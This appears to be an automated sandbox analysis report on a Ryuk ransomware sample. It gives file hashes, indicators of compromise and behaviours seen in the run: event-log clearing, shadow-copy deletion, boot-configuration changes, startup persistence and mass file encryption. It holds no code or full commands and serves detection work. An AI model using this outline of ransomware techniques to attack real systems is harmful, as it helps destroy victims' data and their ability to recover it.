Analysis
-
max time kernel
150s -
max time network
153s -
platform
windows10-2004_x64 -
resource
win10v2004-20220901-en -
resource tags
arch:x64arch:x86image:win10v2004-20220901-enlocale:en-usos:windows10-2004-x64system -
submitted
10-11-2022 06:20
Static task
static1
Behavioral task
behavioral1
Sample
8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe
Resource
win7-20220901-en
Behavioral task
behavioral2
Sample
8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe
Resource
win10v2004-20220901-en
General
-
Target
8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe
-
Size
885KB
-
MD5
a57e1e6fe1c98d2e75799a46e9eb5797
-
SHA1
7878e7042c355546c118a38b90d8f7221f74d8a4
-
SHA256
8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe
-
SHA512
5764f3b1971f64c9d55f387524d92038350dbdf9a7195dc7e3f7b83760d93f45e73dd4c4af6cc597add838acd2d4a4e5b7a96a3444e3c8b0369b1d487621909d
-
SSDEEP
12288:zD7Z7cwy8U9JlpYqWYgeWYg955/155/0QebUlAAsDsKKAosRn6X:z57ctflKgQKUKRDsKKAjN6
Malware Config
Extracted
C:\ProgramData\RyukReadMe.txt
Signatures
-
Ryuk
Ransomware distributed via existing botnets, often Trickbot or Emotet.
-
Clears Windows event logs 1 TTPs 64 IoCs
Processes:
wevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exepid process 4840 wevtutil.exe 4264 wevtutil.exe 2024 wevtutil.exe 3568 wevtutil.exe 4152 wevtutil.exe 4880 wevtutil.exe 4556 wevtutil.exe 4472 wevtutil.exe 1676 wevtutil.exe 1084 wevtutil.exe 3396 wevtutil.exe 4220 wevtutil.exe 3592 wevtutil.exe 60 wevtutil.exe 64 wevtutil.exe 5012 wevtutil.exe 1476 wevtutil.exe 3388 wevtutil.exe 3004 wevtutil.exe 1104 wevtutil.exe 4032 wevtutil.exe 1060 wevtutil.exe 264 wevtutil.exe 4348 wevtutil.exe 4776 wevtutil.exe 788 wevtutil.exe 1476 wevtutil.exe 4888 wevtutil.exe 1660 wevtutil.exe 2024 wevtutil.exe 4888 wevtutil.exe 1020 wevtutil.exe 4160 wevtutil.exe 4040 wevtutil.exe 740 wevtutil.exe 1464 wevtutil.exe 3560 wevtutil.exe 1700 wevtutil.exe 2868 wevtutil.exe 4380 wevtutil.exe 5048 wevtutil.exe 4504 wevtutil.exe 4604 wevtutil.exe 5012 wevtutil.exe 4544 wevtutil.exe 4264 wevtutil.exe 3100 wevtutil.exe 772 wevtutil.exe 2980 wevtutil.exe 4460 wevtutil.exe 3968 wevtutil.exe 1496 wevtutil.exe 688 wevtutil.exe 2996 wevtutil.exe 1276 wevtutil.exe 1876 wevtutil.exe 3448 wevtutil.exe 536 wevtutil.exe 5084 wevtutil.exe 872 wevtutil.exe 912 wevtutil.exe 1244 wevtutil.exe 4932 wevtutil.exe 3996 wevtutil.exe -
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
Processes:
bcdedit.exebcdedit.exepid process 3100 bcdedit.exe 4992 bcdedit.exe -
Processes:
wbadmin.exepid process 728 wbadmin.exe -
Disables Task Manager via registry modification
-
Disables taskbar notifications via registry modification
-
Disables use of System Restore points 1 TTPs
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
cmd.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation cmd.exe -
Drops startup file 3 IoCs
Processes:
cmd.exeattrib.exedescription ioc process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe cmd.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe cmd.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe attrib.exe -
Modifies file permissions 1 TTPs 1 IoCs
-
Enumerates connected drives 3 TTPs 42 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
vssadmin.exevssadmin.exevssadmin.exe8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exedescription ioc process File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\f: vssadmin.exe File opened (read-only) \??\h: vssadmin.exe File opened (read-only) \??\S: 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe File opened (read-only) \??\D: vssadmin.exe File opened (read-only) \??\G: vssadmin.exe File opened (read-only) \??\g: vssadmin.exe File opened (read-only) \??\U: 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\E: vssadmin.exe File opened (read-only) \??\T: 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe File opened (read-only) \??\Z: 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe File opened (read-only) \??\H: 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe File opened (read-only) \??\J: 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe File opened (read-only) \??\W: 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe File opened (read-only) \??\D: vssadmin.exe File opened (read-only) \??\e: vssadmin.exe File opened (read-only) \??\G: vssadmin.exe File opened (read-only) \??\F: 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe File opened (read-only) \??\O: 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe File opened (read-only) \??\A: 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe File opened (read-only) \??\B: 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe File opened (read-only) \??\R: 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe File opened (read-only) \??\f: vssadmin.exe File opened (read-only) \??\h: vssadmin.exe File opened (read-only) \??\H: vssadmin.exe File opened (read-only) \??\E: 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe File opened (read-only) \??\N: 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe File opened (read-only) \??\K: 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe File opened (read-only) \??\P: 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe File opened (read-only) \??\Y: 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe File opened (read-only) \??\e: vssadmin.exe File opened (read-only) \??\G: 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe File opened (read-only) \??\I: 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe File opened (read-only) \??\Q: 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe File opened (read-only) \??\V: 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe File opened (read-only) \??\X: 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe File opened (read-only) \??\E: vssadmin.exe File opened (read-only) \??\g: vssadmin.exe File opened (read-only) \??\H: vssadmin.exe File opened (read-only) \??\L: 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe File opened (read-only) \??\M: 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe -
Drops file in Program Files directory 64 IoCs
Processes:
8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exedescription ioc process File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\walk-through\js\nls\fr-fr\ui-strings.js.[[email protected]].RYK 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.rjmx.zh_CN_5.5.0.165303.jar.[[email protected]].RYK 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\tools\themes\dark\x.cur.[[email protected]].RYK 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\LogoImages\PowerPntLogo.scale-180.png.[[email protected]].RYK 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Office\Office16\GROOVEEX.DLL.[[email protected]].RYK 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_folder-hover_32.svg.[[email protected]].RYK 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\ui-strings.js.[[email protected]].RYK 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\ResiliencyLinks\Locales\mk.pak.DATA.[[email protected]].RYK 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\VisioPro2019R_Trial-pl.xrm-ms.[[email protected]].RYK 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\TRANSLAT\FREN\WT61FR.LEX.[[email protected]].RYK 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\tr-tr\ui-strings.js.[[email protected]].RYK 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\org-netbeans-modules-settings.jar.[[email protected]].RYK 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGMN086.XML.[[email protected]].RYK 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\msedge_100_percent.pak.[[email protected]].RYK 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\com.jrockit.mc.feature.console_5.5.0.165303\feature.properties.[[email protected]].RYK 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe File opened for modification C:\Program Files\Java\jre1.8.0_66\lib\management-agent.jar.[[email protected]].RYK 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\1033\SETLANG_COL.HXT.[[email protected]].RYK 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\sv-se\ui-strings.js.[[email protected]].RYK 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\ja-jp\ui-strings.js.[[email protected]].RYK 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\ResiliencyLinks\Locales\ur.pak.DATA.[[email protected]].RYK 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\lib\deploy\messages_fr.properties.[[email protected]].RYK 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.ssl.feature_1.0.0.v20140827-1444\license.html.[[email protected]].RYK 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Locales\da.pak.[[email protected]].RYK 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\plugin.js.[[email protected]].RYK 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\images\themes\dark\Close.png.[[email protected]].RYK 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe File opened for modification C:\Program Files (x86)\Common Files\Adobe\Reader\DC\Linguistics\Providers\Plugins2\AdobeHunspellPlugin\Dummy.aff.[[email protected]].RYK 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.swt.win32.win32.x86_64.nl_ja_4.4.0.v20140623020002.jar.[[email protected]].RYK 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\tr-tr\AppStore_icon.svg.[[email protected]].RYK 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\O365ProPlusE5R_SubTrial-pl.xrm-ms.[[email protected]].RYK 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\playlist\newgrounds.luac.[[email protected]].RYK 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProfessionalR_Retail-ppd.xrm-ms.[[email protected]].RYK 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000042\catalog.json.[[email protected]].RYK 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\OFFICE16\MSOXMLMF.DLL.[[email protected]].RYK 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\walk-through\css\main.css.[[email protected]].RYK 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Locales\it.pak.[[email protected]].RYK 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\schema\triggerConstraints.exsd.[[email protected]].RYK 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\MondoR_SubTest-ul-oob.xrm-ms.[[email protected]].RYK 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\vk_swiftshader_icd.json.[[email protected]].RYK 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\VisioStdO365R_SubTrial-pl.xrm-ms.[[email protected]].RYK 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-bg_glass_100_fdf5ce_1x400.png.[[email protected]].RYK 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Locales\pt-PT.pak.[[email protected]].RYK 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\lib\jsse.jar.[[email protected]].RYK 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\VBA\VBA6\VBE6EXT.OLB.[[email protected]].RYK 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\LAYERS\THMBNAIL.PNG.[[email protected]].RYK 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProjectPro2019XC2RVL_MAKC2R-ul-oob.xrm-ms.[[email protected]].RYK 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\VisioPro2019VL_KMS_Client_AE-ppd.xrm-ms.[[email protected]].RYK 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\close_x.png.[[email protected]].RYK 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\cs-cz\ui-strings.js.[[email protected]].RYK 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe File opened for modification C:\Program Files\Microsoft Office\root\Templates\1033\ChronologicalResume.dotx.[[email protected]].RYK 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\tr-tr\ui-strings.js.[[email protected]].RYK 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\ICE\PREVIEW.GIF.[[email protected]].RYK 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\HomeBusinessR_Trial2-ppd.xrm-ms.[[email protected]].RYK 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProPlus2019DemoR_BypassTrial180-ul-oob.xrm-ms.[[email protected]].RYK 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\1033\offsym.ttf.[[email protected]].RYK 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\images\digsig_icons.png.[[email protected]].RYK 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Trust Protection Lists\Sigma\Staging.[[email protected]].RYK 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.core.feature_1.1.0.v20140827-1444\META-INF\ECLIPSE_.SF.[[email protected]].RYK 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.e4.ui.workbench.addons.swt_1.1.1.v20140903-0821.jar.[[email protected]].RYK 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\1033\WINWORD.HXS.[[email protected]].RYK 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\help.svg.[[email protected]].RYK 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\MLModels\nexturl.ort.[[email protected]].RYK 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-modules-progress-ui_ja.jar.[[email protected]].RYK 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\Personal2019R_Retail-ul-phn.xrm-ms.[[email protected]].RYK 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\lpklegal.txt.[[email protected]].RYKCRYPT 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe -
Drops file in Windows directory 5 IoCs
Processes:
8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exewbadmin.exedescription ioc process File created C:\Windows\hrmlog1 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe File opened for modification C:\Windows\Logs\WindowsBackup\WBEngine.3.etl wbadmin.exe File opened for modification C:\Windows\Logs\WindowsBackup\WBEngine.2.etl wbadmin.exe File opened for modification C:\Windows\Logs\WindowsBackup\WBEngine.1.etl wbadmin.exe File created C:\Windows\RyukReadMe.txt 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe -
Launches sc.exe 4 IoCs
Sc.exe is a Windows utlilty to control services on the system.
Processes:
sc.exesc.exesc.exesc.exepid process 2396 sc.exe 4788 sc.exe 4684 sc.exe 1296 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 4 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exeschtasks.exeschtasks.exepid process 4836 schtasks.exe 1292 schtasks.exe 1252 schtasks.exe 1676 schtasks.exe -
Interacts with shadow copies 2 TTPs 15 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
Processes:
vssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exepid process 3956 vssadmin.exe 1660 vssadmin.exe 3668 vssadmin.exe 848 vssadmin.exe 4380 vssadmin.exe 1768 vssadmin.exe 552 vssadmin.exe 2556 vssadmin.exe 1008 vssadmin.exe 4772 vssadmin.exe 3460 vssadmin.exe 488 vssadmin.exe 3592 vssadmin.exe 1676 vssadmin.exe 3376 vssadmin.exe -
Kills process with taskkill 5 IoCs
Processes:
taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exepid process 3764 taskkill.exe 3772 taskkill.exe 2148 taskkill.exe 4312 taskkill.exe 4348 taskkill.exe -
Modifies registry class 1 IoCs
Processes:
cmd.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings cmd.exe -
Opens file in notepad (likely ransom note) 1 IoCs
Processes:
NOTEPAD.EXEpid process 2492 NOTEPAD.EXE -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exepid process 1652 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe 1652 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe 1652 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe 1652 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe 1652 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe 1652 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe 1652 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe 1652 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe 1652 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe 1652 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe 1652 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe 1652 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe 1652 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe 1652 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe 1652 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe 1652 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe 1652 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe 1652 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe 1652 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe 1652 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe 1652 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe 1652 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe 1652 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe 1652 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe 1652 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe 1652 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe 1652 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe 1652 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe 1652 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe 1652 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe 1652 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe 1652 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe 1652 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe 1652 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe 1652 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe 1652 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe 